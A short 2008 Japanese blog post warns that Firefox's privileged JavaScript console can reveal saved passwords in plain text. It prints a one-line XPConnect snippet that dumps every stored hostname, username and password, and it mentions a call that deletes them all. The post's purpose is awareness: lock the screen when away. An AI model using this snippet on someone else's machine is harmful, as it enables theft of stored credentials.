2008/06/12

Recent entries from same category

  1. xtag と angular1 を足して2で割った感じに使える薄い JavaScript ライブラリ「sj.js」
  2. Web Component を簡単に作れる JavaScript ライブラリ「X-Tag」
  3. twitter.bat
  4. jQueryプラグインとして動作するGithub Badge作ってみた。
  5. XSLとjQuery/HTMLだけで作る、amazon最速検索

JavaScriptコンソールからパスワードぶっこ抜き - hogehoge

JavaScriptコンソールの上部の入力欄はChrome特権のコードも実行できるんで、XPConnectからゴニョゴニョっとやると平文パスワードを覗くことができちゃうんだね。

PCから離れるときは画面ロックをしないと危険ということかな。

ホントだ怖い。
具体的なコードは
Cc["@mozilla.org/login-manager;1"].getService(Ci.nsILoginManager).getAllLogins({}).forEach(function(li){ console.log(li.hostname + ":" + li.username + "," + li.password) });
※あっ書いちゃった...

離席中に覗かれるのも怖いけど、removeAllLogins実行されるのも怖い。

※もちろん特権ないと実行出来ないのでブラウジングだけで盗まれる物ではありません。
Posted at by | Edit


blog comments powered by Disqus